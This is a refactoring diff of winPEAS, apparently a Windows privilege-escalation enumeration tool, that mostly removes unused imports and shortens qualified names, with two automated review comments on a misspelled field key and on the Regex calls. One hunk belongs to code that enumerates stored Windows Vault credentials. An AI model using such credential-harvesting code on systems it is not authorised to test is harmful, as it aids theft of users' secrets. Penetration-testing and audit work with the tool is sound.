{ new Guid("E69D7838-91B5-4FC9-89D5-230D4D4CC2BC"), "Windows Domain Certificate Credential" },
|
||||
{ new Guid("3E0E35BE-1B77-43E7-B873-AED901B6275B"), "Windows Domain Password Credential" },
|
||||
{ new Guid("3C886FF3-2669-4AA2-A8FB-3F6759A77548"), "Windows Extended Credential" },
|
||||
{ new Guid("00000000-0000-0000-0000-000000000000"), null }
|
||||
};
|
||||
|
||||
for (int i = 0; i < vaultCount; i++)
|
||||
{
|
||||
@@ -167,7 +169,7 @@ namespace winPEAS.KnownFileCreds.Vault
|
||||
vault_cred["PacakgeSid"] = string.Format("{0}", packageSid);
|
||||
}
|
||||
vault_cred["Credential"] = string.Format("{0}", cred);
|
||||
vault_cred["Last Modified"] = string.Format("{0}", System.DateTime.FromFileTimeUtc((long)lastModified));
|
||||
vault_cred["Last Modified"] = string.Format("{0}", DateTime.FromFileTimeUtc((long)lastModified));
|
||||
results.Add(vault_cred);
|
||||
}
|
||||
}
|
||||
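Review bot: The result key `"PacakgeSid"` in the second hunk is misspelled, so anything that filters or parses the vault output by field name will miss it; the intended line is presumably `vault_cred["PackageSid"] = string.Format("{0}", packageSid);`. If other code reads the key back under the current spelling, that reader (not visible here) needs the same change. Separately, `DateTime.FromFileTimeUtc((long)lastModified)` throws `ArgumentOutOfRangeException` for out-of-range values. The declared type of `lastModified` is outside the hunk, so confirm the cast cannot produce such a value. The enclosing method starts and ends outside both hunks.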
|
||||
@@ -1,7 +1,6 @@
|
||||
using System;
|
||||
using System.Runtime.InteropServices;
|
||||
using winPEAS.Native.Enums;
|
||||
using winPEAS.TaskScheduler.TaskEditor.Native;
|
||||
|
||||
namespace winPEAS.Native.Classes
|
||||
{
|
||||
|
||||
@@ -1,7 +1,5 @@
|
||||
using System;
|
||||
using System.Runtime.ConstrainedExecution;
|
||||
using System.Runtime.InteropServices;
|
||||
using winPEAS.Info.SystemInfo.NamedPipes;
|
||||
|
||||
namespace winPEAS.Native
|
||||
{
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
using System.Reflection;
|
||||
using System.Runtime.CompilerServices;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
// General Information about an assembly is controlled through the following
|
||||
|
||||
@@ -2,8 +2,6 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Security.AccessControl;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
{
|
||||
@@ -20,7 +18,7 @@ namespace winPEAS.TaskScheduler
|
||||
var aces = new System.Collections.Generic.List<GenericAce>(acl.Cast<GenericAce>());
|
||||
|
||||
// Sort aces based on canonical order
|
||||
aces.Sort((a, b) => System.Collections.Generic.Comparer<byte>.Default.Compare(GetComparisonValue(a), GetComparisonValue(b)));
|
||||
aces.Sort((a, b) => Comparer<byte>.Default.Compare(GetComparisonValue(a), GetComparisonValue(b)));
|
||||
|
||||
// Add sorted aces back to ACL
|
||||
while (acl.Count > 0) acl.RemoveAce(0);
|
||||
|
||||
@@ -1,10 +1,10 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.ComponentModel;
|
||||
using System.Reflection;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Xml.Serialization;
|
||||
using Microsoft.Win32;
|
||||
using winPEAS.TaskScheduler.V1;
|
||||
using winPEAS.TaskScheduler.V2;
|
||||
|
||||
|
||||
@@ -3,11 +3,8 @@ using System.Collections;
|
||||
using System.Collections.Generic;
|
||||
using System.Collections.Specialized;
|
||||
using System.ComponentModel;
|
||||
using System.Linq;
|
||||
using System.Runtime.CompilerServices;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
using System.Xml.Serialization;
|
||||
using winPEAS.TaskScheduler.TaskEditor.Native;
|
||||
using winPEAS.TaskScheduler.V1;
|
||||
@@ -706,7 +703,7 @@ namespace winPEAS.TaskScheduler
|
||||
}
|
||||
}
|
||||
else
|
||||
ret.Add(Action.ExecAction.ConvertFromPowerShellAction(exec));
|
||||
ret.Add(Action.ConvertFromPowerShellAction(exec));
|
||||
}
|
||||
else if (!string.IsNullOrEmpty(exec.Path))
|
||||
{
|
||||
|
||||
@@ -1,9 +1,5 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
using System.Threading;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
{
|
||||
|
||||
@@ -1,9 +1,6 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.ComponentModel;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
{
|
||||
|
||||
@@ -1,8 +1,4 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
{
|
||||
|
||||
@@ -2,10 +2,7 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Collections.Specialized;
|
||||
using System.ComponentModel;
|
||||
using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
using System.Xml.Serialization;
|
||||
using winPEAS.TaskScheduler.TaskEditor.Native;
|
||||
using winPEAS.TaskScheduler.V2;
|
||||
|
||||
@@ -1,12 +1,8 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Diagnostics;
|
||||
using System.Linq;
|
||||
using System.Runtime.Serialization;
|
||||
using System.Security;
|
||||
using System.Security.Permissions;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
{
|
||||
|
||||
@@ -1,9 +1,5 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Reflection;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
{
|
||||
|
||||
@@ -1,10 +1,7 @@
|
||||
using System;
|
||||
using System.Collections;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.TaskScheduler.TaskEditor.Native
|
||||
{
|
||||
|
||||
@@ -68,7 +68,7 @@ namespace winPEAS.TaskScheduler.TaskEditor.Native
|
||||
public string CrackName(string name)
|
||||
{
|
||||
var res = CrackNames(new string[] { name });
|
||||
if (res == null || res.Length == 0 || res[0].status != NativeMethods.DS_NAME_ERROR.DS_NAME_NO_ERROR)
|
||||
if (res == null || res.Length == 0 || res[0].status != DS_NAME_ERROR.DS_NAME_NO_ERROR)
|
||||
throw new SecurityException("Unable to resolve user name.");
|
||||
return res[0].pName;
|
||||
}
|
||||
|
||||
@@ -66,12 +66,12 @@ namespace winPEAS.TaskScheduler.TaskEditor.Native
|
||||
public struct NetworkComputerInfo // SERVER_INFO_101
|
||||
{
|
||||
ServerPlatform sv101_platform_id;
|
||||
[MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)]
|
||||
[MarshalAs(UnmanagedType.LPWStr)]
|
||||
string sv101_name;
|
||||
int sv101_version_major;
|
||||
int sv101_version_minor;
|
||||
ServerTypes sv101_type;
|
||||
[MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)]
|
||||
[MarshalAs(UnmanagedType.LPWStr)]
|
||||
string sv101_comment;
|
||||
|
||||
public ServerPlatform Platform => sv101_platform_id;
|
||||
|
||||
@@ -1,9 +1,6 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Diagnostics.Eventing.Reader;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
{
|
||||
|
||||
@@ -1,13 +1,10 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security;
|
||||
using System.Security.AccessControl;
|
||||
using System.Text;
|
||||
using System.Text.RegularExpressions;
|
||||
using System.Threading.Tasks;
|
||||
using winPEAS.TaskScheduler.V1;
|
||||
using winPEAS.TaskScheduler.V2;
|
||||
|
||||
|
||||
@@ -2,10 +2,7 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Collections.Specialized;
|
||||
using System.ComponentModel;
|
||||
using System.Linq;
|
||||
using System.Runtime.CompilerServices;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
using winPEAS.TaskScheduler.TaskEditor.Native;
|
||||
using winPEAS.TaskScheduler.V2;
|
||||
|
||||
|
||||
@@ -1,9 +1,5 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
{
|
||||
|
||||
@@ -2,10 +2,7 @@
|
||||
using System.Collections.Generic;
|
||||
using System.ComponentModel;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
using winPEAS.TaskScheduler.V1;
|
||||
using winPEAS.TaskScheduler.V2;
|
||||
|
||||
@@ -718,7 +715,7 @@ namespace winPEAS.TaskScheduler
|
||||
}
|
||||
else
|
||||
{
|
||||
taskPath = System.IO.Path.GetFileNameWithoutExtension(taskPath);
|
||||
taskPath = Path.GetFileNameWithoutExtension(taskPath);
|
||||
var iTask = GetTask(v1TaskScheduler, taskPath);
|
||||
if (iTask != null)
|
||||
t = new Task(this, iTask);
|
||||
@@ -746,7 +743,7 @@ namespace winPEAS.TaskScheduler
|
||||
public TaskDefinition NewTaskFromFile([NotNull] string xmlFile)
|
||||
{
|
||||
var td = NewTask();
|
||||
td.XmlText = System.IO.File.ReadAllText(xmlFile);
|
||||
td.XmlText = File.ReadAllText(xmlFile);
|
||||
return td;
|
||||
}
|
||||
|
||||
|
||||
@@ -2,11 +2,9 @@
|
||||
using System.Collections.Generic;
|
||||
using System.ComponentModel;
|
||||
using System.Globalization;
|
||||
using System.Linq;
|
||||
using System.Runtime.CompilerServices;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
using System.Xml.Serialization;
|
||||
using winPEAS.Properties;
|
||||
using winPEAS.TaskScheduler.V1;
|
||||
@@ -217,7 +215,7 @@ namespace winPEAS.TaskScheduler
|
||||
|
||||
/// <summary>Gets the non-localized trigger string for V2 triggers.</summary>
|
||||
/// <returns>String describing the trigger.</returns>
|
||||
protected override string V2GetTriggerString() => Properties.Resources.TriggerBoot1;
|
||||
protected override string V2GetTriggerString() => Resources.TriggerBoot1;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
@@ -419,8 +417,8 @@ namespace winPEAS.TaskScheduler
|
||||
/// <summary>Gets the non-localized trigger string for V2 triggers.</summary>
|
||||
/// <returns>String describing the trigger.</returns>
|
||||
protected override string V2GetTriggerString() => DaysInterval == 1 ?
|
||||
string.Format(Properties.Resources.TriggerDaily1, AdjustToLocal(StartBoundary)) :
|
||||
string.Format(Properties.Resources.TriggerDaily2, AdjustToLocal(StartBoundary), DaysInterval);
|
||||
string.Format(Resources.TriggerDaily1, AdjustToLocal(StartBoundary)) :
|
||||
string.Format(Resources.TriggerDaily2, AdjustToLocal(StartBoundary), DaysInterval);
|
||||
|
||||
private void ReadMyXml(System.Xml.XmlReader reader)
|
||||
{
|
||||
@@ -633,13 +631,13 @@ namespace winPEAS.TaskScheduler
|
||||
protected override string V2GetTriggerString()
|
||||
{
|
||||
if (!GetBasic(out var log, out var source, out var id))
|
||||
return Properties.Resources.TriggerEvent1;
|
||||
return Resources.TriggerEvent1;
|
||||
var sb = new StringBuilder();
|
||||
sb.AppendFormat(Properties.Resources.TriggerEventBasic1, log);
|
||||
sb.AppendFormat(Resources.TriggerEventBasic1, log);
|
||||
if (!string.IsNullOrEmpty(source))
|
||||
sb.AppendFormat(Properties.Resources.TriggerEventBasic2, source);
|
||||
sb.AppendFormat(Resources.TriggerEventBasic2, source);
|
||||
if (id.HasValue)
|
||||
sb.AppendFormat(Properties.Resources.TriggerEventBasic3, id.Value);
|
||||
sb.AppendFormat(Resources.TriggerEventBasic3, id.Value);
|
||||
return sb.ToString();
|
||||
}
|
||||
}
|
||||
@@ -674,7 +672,7 @@ namespace winPEAS.TaskScheduler
|
||||
|
||||
/// <summary>Gets the non-localized trigger string for V2 triggers.</summary>
|
||||
/// <returns>String describing the trigger.</returns>
|
||||
protected override string V2GetTriggerString() => Properties.Resources.TriggerIdle1;
|
||||
protected override string V2GetTriggerString() => Resources.TriggerIdle1;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
@@ -761,8 +759,8 @@ namespace winPEAS.TaskScheduler
|
||||
/// <returns>String describing the trigger.</returns>
|
||||
protected override string V2GetTriggerString()
|
||||
{
|
||||
var user = string.IsNullOrEmpty(UserId) ? Properties.Resources.TriggerAnyUser : UserId;
|
||||
return string.Format(Properties.Resources.TriggerLogon1, user);
|
||||
var user = string.IsNullOrEmpty(UserId) ? Resources.TriggerAnyUser : UserId;
|
||||
return string.Format(Resources.TriggerLogon1, user);
|
||||
}
|
||||
}
|
||||
|
||||
@@ -971,7 +969,7 @@ namespace winPEAS.TaskScheduler
|
||||
var ww = TaskEnumGlobalizer.GetString(WeeksOfMonth);
|
||||
var days = TaskEnumGlobalizer.GetString(DaysOfWeek);
|
||||
var months = TaskEnumGlobalizer.GetString(MonthsOfYear);
|
||||
return string.Format(Properties.Resources.TriggerMonthlyDOW1, AdjustToLocal(StartBoundary), ww, days, months);
|
||||
return string.Format(Resources.TriggerMonthlyDOW1, AdjustToLocal(StartBoundary), ww, days, months);
|
||||
}
|
||||
|
||||
/// <summary>Reads the subclass XML for V1 streams.</summary>
|
||||
@@ -1249,11 +1247,11 @@ namespace winPEAS.TaskScheduler
|
||||
/// <returns>String describing the trigger.</returns>
|
||||
protected override string V2GetTriggerString()
|
||||
{
|
||||
var days = string.Join(Properties.Resources.ListSeparator, Array.ConvertAll(DaysOfMonth, i => i.ToString()));
|
||||
var days = string.Join(Resources.ListSeparator, Array.ConvertAll(DaysOfMonth, i => i.ToString()));
|
||||
if (RunOnLastDayOfMonth)
|
||||
days += (days.Length == 0 ? "" : Properties.Resources.ListSeparator) + Properties.Resources.WWLastWeek;
|
||||
days += (days.Length == 0 ? "" : Resources.ListSeparator) + Resources.WWLastWeek;
|
||||
var months = TaskEnumGlobalizer.GetString(MonthsOfYear);
|
||||
return string.Format(Properties.Resources.TriggerMonthly1, AdjustToLocal(StartBoundary), days, months);
|
||||
return string.Format(Resources.TriggerMonthly1, AdjustToLocal(StartBoundary), days, months);
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
@@ -1428,7 +1426,7 @@ namespace winPEAS.TaskScheduler
|
||||
|
||||
/// <summary>Gets the non-localized trigger string for V2 triggers.</summary>
|
||||
/// <returns>String describing the trigger.</returns>
|
||||
protected override string V2GetTriggerString() => Properties.Resources.TriggerRegistration1;
|
||||
protected override string V2GetTriggerString() => Resources.TriggerRegistration1;
|
||||
}
|
||||
|
||||
/// <summary>Defines how often the task is run and how long the repetition pattern is repeated after the task is started.</summary>
|
||||
@@ -1770,10 +1768,10 @@ namespace winPEAS.TaskScheduler
|
||||
/// <returns>String describing the trigger.</returns>
|
||||
protected override string V2GetTriggerString()
|
||||
{
|
||||
var str = Properties.Resources.ResourceManager.GetString("TriggerSession" + StateChange.ToString());
|
||||
var user = string.IsNullOrEmpty(UserId) ? Properties.Resources.TriggerAnyUser : UserId;
|
||||
var str = Resources.ResourceManager.GetString("TriggerSession" + StateChange.ToString());
|
||||
var user = string.IsNullOrEmpty(UserId) ? Resources.TriggerAnyUser : UserId;
|
||||
if (StateChange != TaskSessionStateChangeType.SessionLock && StateChange != TaskSessionStateChangeType.SessionUnlock)
|
||||
user = string.Format(Properties.Resources.TriggerSessionUserSession, user);
|
||||
user = string.Format(Resources.TriggerSessionUserSession, user);
|
||||
return string.Format(str, user);
|
||||
}
|
||||
|
||||
@@ -1839,7 +1837,7 @@ namespace winPEAS.TaskScheduler
|
||||
|
||||
/// <summary>Gets the non-localized trigger string for V2 triggers.</summary>
|
||||
/// <returns>String describing the trigger.</returns>
|
||||
protected override string V2GetTriggerString() => string.Format(Properties.Resources.TriggerTime1, AdjustToLocal(StartBoundary));
|
||||
protected override string V2GetTriggerString() => string.Format(Resources.TriggerTime1, AdjustToLocal(StartBoundary));
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
@@ -1946,7 +1944,7 @@ namespace winPEAS.TaskScheduler
|
||||
if (v2Trigger != null)
|
||||
{
|
||||
if (value <= StartBoundary)
|
||||
throw new ArgumentException(Properties.Resources.Error_TriggerEndBeforeStart);
|
||||
throw new ArgumentException(Resources.Error_TriggerEndBeforeStart);
|
||||
v2Trigger.EndBoundary = value == DateTime.MaxValue ? null : value.ToString(V2BoundaryDateFormat, DefaultDateCulture);
|
||||
}
|
||||
else
|
||||
@@ -2063,7 +2061,7 @@ namespace winPEAS.TaskScheduler
|
||||
if (v2Trigger != null)
|
||||
{
|
||||
if (value > EndBoundary)
|
||||
throw new ArgumentException(Properties.Resources.Error_TriggerEndBeforeStart);
|
||||
throw new ArgumentException(Resources.Error_TriggerEndBeforeStart);
|
||||
v2Trigger.StartBoundary = value == DateTime.MinValue ? null : value.ToString(V2BoundaryDateFormat, DefaultDateCulture);
|
||||
}
|
||||
else
|
||||
@@ -2381,7 +2379,7 @@ namespace winPEAS.TaskScheduler
|
||||
v2Trigger = iTriggers.Create(ttype);
|
||||
Marshal.ReleaseComObject(iTriggers);
|
||||
if ((unboundValues.TryGetValue("StartBoundary", out var dt) ? (DateTime)dt : StartBoundary) > (unboundValues.TryGetValue("EndBoundary", out dt) ? (DateTime)dt : EndBoundary))
|
||||
throw new ArgumentException(Properties.Resources.Error_TriggerEndBeforeStart);
|
||||
throw new ArgumentException(Resources.Error_TriggerEndBeforeStart);
|
||||
foreach (var key in unboundValues.Keys)
|
||||
{
|
||||
try
|
||||
@@ -2406,7 +2404,7 @@ namespace winPEAS.TaskScheduler
|
||||
if (v1TriggerData.MinutesInterval != 0 && v1TriggerData.MinutesInterval >= v1TriggerData.MinutesDuration)
|
||||
throw new ArgumentException("Trigger.Repetition.Interval must be less than Trigger.Repetition.Duration under Task Scheduler 1.0.");
|
||||
if (v1TriggerData.EndDate <= v1TriggerData.BeginDate)
|
||||
throw new ArgumentException(Properties.Resources.Error_TriggerEndBeforeStart);
|
||||
throw new ArgumentException(Resources.Error_TriggerEndBeforeStart);
|
||||
if (v1TriggerData.BeginDate == DateTime.MinValue)
|
||||
v1TriggerData.BeginDate = DateTime.Now;
|
||||
v1Trigger?.SetTrigger(ref v1TriggerData);
|
||||
@@ -2456,13 +2454,13 @@ namespace winPEAS.TaskScheduler
|
||||
var ret = new StringBuilder();
|
||||
if (Repetition.Interval != TimeSpan.Zero)
|
||||
{
|
||||
var sduration = Repetition.Duration == TimeSpan.Zero ? Properties.Resources.TriggerDuration0 : string.Format(Properties.Resources.TriggerDurationNot0, GetBestTimeSpanString(Repetition.Duration));
|
||||
ret.AppendFormat(Properties.Resources.TriggerRepetition, GetBestTimeSpanString(Repetition.Interval), sduration);
|
||||
var sduration = Repetition.Duration == TimeSpan.Zero ? Resources.TriggerDuration0 : string.Format(Resources.TriggerDurationNot0, GetBestTimeSpanString(Repetition.Duration));
|
||||
ret.AppendFormat(Resources.TriggerRepetition, GetBestTimeSpanString(Repetition.Interval), sduration);
|
||||
}
|
||||
if (EndBoundary != DateTime.MaxValue)
|
||||
ret.AppendFormat(Properties.Resources.TriggerEndBoundary, AdjustToLocal(EndBoundary));
|
||||
ret.AppendFormat(Resources.TriggerEndBoundary, AdjustToLocal(EndBoundary));
|
||||
if (ret.Length > 0)
|
||||
ret.Insert(0, Properties.Resources.HyphenSeparator);
|
||||
ret.Insert(0, Resources.HyphenSeparator);
|
||||
return ret.ToString();
|
||||
}
|
||||
}
|
||||
@@ -2609,7 +2607,7 @@ namespace winPEAS.TaskScheduler
|
||||
protected override string V2GetTriggerString()
|
||||
{
|
||||
var days = TaskEnumGlobalizer.GetString(DaysOfWeek);
|
||||
return string.Format(WeeksInterval == 1 ? Properties.Resources.TriggerWeekly1Week : Properties.Resources.TriggerWeeklyMultWeeks, AdjustToLocal(StartBoundary), days, WeeksInterval);
|
||||
return string.Format(WeeksInterval == 1 ? Resources.TriggerWeekly1Week : Resources.TriggerWeeklyMultWeeks, AdjustToLocal(StartBoundary), days, WeeksInterval);
|
||||
}
|
||||
|
||||
/// <summary>Reads the subclass XML for V1 streams.</summary>
|
||||
@@ -2775,8 +2773,8 @@ namespace winPEAS.TaskScheduler
|
||||
var rp = (RepetitionPattern)value;
|
||||
if (destinationType != typeof(string)) return base.ConvertTo(context, culture, value, destinationType);
|
||||
if (rp.Interval == TimeSpan.Zero) return "";
|
||||
var sduration = rp.Duration == TimeSpan.Zero ? Properties.Resources.TriggerDuration0 : string.Format(Properties.Resources.TriggerDurationNot0Short, Trigger.GetBestTimeSpanString(rp.Duration));
|
||||
return string.Format(Properties.Resources.TriggerRepetitionShort, Trigger.GetBestTimeSpanString(rp.Interval), sduration);
|
||||
var sduration = rp.Duration == TimeSpan.Zero ? Resources.TriggerDuration0 : string.Format(Resources.TriggerDurationNot0Short, Trigger.GetBestTimeSpanString(rp.Duration));
|
||||
return string.Format(Resources.TriggerRepetitionShort, Trigger.GetBestTimeSpanString(rp.Interval), sduration);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -3,11 +3,8 @@ using System.Collections;
|
||||
using System.Collections.Generic;
|
||||
using System.Collections.Specialized;
|
||||
using System.ComponentModel;
|
||||
using System.Linq;
|
||||
using System.Runtime.CompilerServices;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
using System.Xml.Serialization;
|
||||
using winPEAS.TaskScheduler.TaskEditor.Native;
|
||||
using winPEAS.TaskScheduler.V1;
|
||||
|
||||
@@ -1,9 +1,5 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Security.Principal;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
using winPEAS.TaskScheduler.TaskEditor.Native;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
|
||||
@@ -1,9 +1,4 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
using System.Text.RegularExpressions;
|
||||
using System.Threading.Tasks;
|
||||
using System.Text.RegularExpressions;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
{
|
||||
@@ -30,12 +25,12 @@ namespace winPEAS.TaskScheduler
|
||||
/// <returns>A regular expression equivalent of the given wildcard.</returns>
|
||||
public static string WildcardToRegex([NotNull] string pattern)
|
||||
{
|
||||
string s = Regex.Escape(pattern);
|
||||
s = Regex.Replace(s, @"(?<!\\)\\\*", @".*"); // Negative Lookbehind
|
||||
s = Regex.Replace(s, @"\\\\\\\*", @"\*");
|
||||
s = Regex.Replace(s, @"(?<!\\)\\\?", @"."); // Negative Lookbehind
|
||||
s = Regex.Replace(s, @"\\\\\\\?", @"\?");
|
||||
return string.Concat("^", Regex.Replace(s, @"\\\\\\\\", @"\\"), "$");
|
||||
string s = Escape(pattern);
|
||||
s = Replace(s, @"(?<!\\)\\\*", @".*"); // Negative Lookbehind
|
||||
s = Replace(s, @"\\\\\\\*", @"\*");
|
||||
s = Replace(s, @"(?<!\\)\\\?", @"."); // Negative Lookbehind
|
||||
s = Replace(s, @"\\\\\\\?", @"\?");
|
||||
return string.Concat("^", Replace(s, @"\\\\\\\\", @"\\"), "$");
|
||||
}
|
||||
}
|
||||
}
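Review bot: Dropping the `Regex.` qualifier in WildcardToRegex means `Escape(pattern)` and `Replace(s, …)` now resolve only through the enclosing class's base type, which this hunk does not show (presumably the class derives from Regex). Unqualified, `Replace` reads like a string operation, so the intent of the method is harder to follow. If the short form is kept, a comment above the first call would restore the cue, e.g. `// Escape/Replace are the static Regex members inherited by this class`. The second and fourth replacements also lack comments; something like `// an escaped \* in the wildcard stays a literal '*'` (and the same for `\?`) would explain why the order of the calls matters.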
|
||||
|
||||
@@ -1,14 +1,9 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.ComponentModel;
|
||||
using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security.Principal;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
using winPEAS.Native;
|
||||
using winPEAS.Native.Classes;
|
||||
using winPEAS.TaskScheduler.TaskEditor.Native;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
{
|
||||
|
||||
@@ -1,10 +1,8 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.ComponentModel;
|
||||
using System.Linq;
|
||||
using System.Reflection;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
using System.Xml;
|
||||
using System.Xml.Serialization;
|
||||
|
||||
|
||||
@@ -1,7 +1,5 @@
|
||||
using System;
|
||||
using System.ComponentModel;
|
||||
using System.ComponentModel;
|
||||
using System.Diagnostics;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
namespace winPEAS.Wifi.NativeWifiApi
|
||||
{
|
||||
|
||||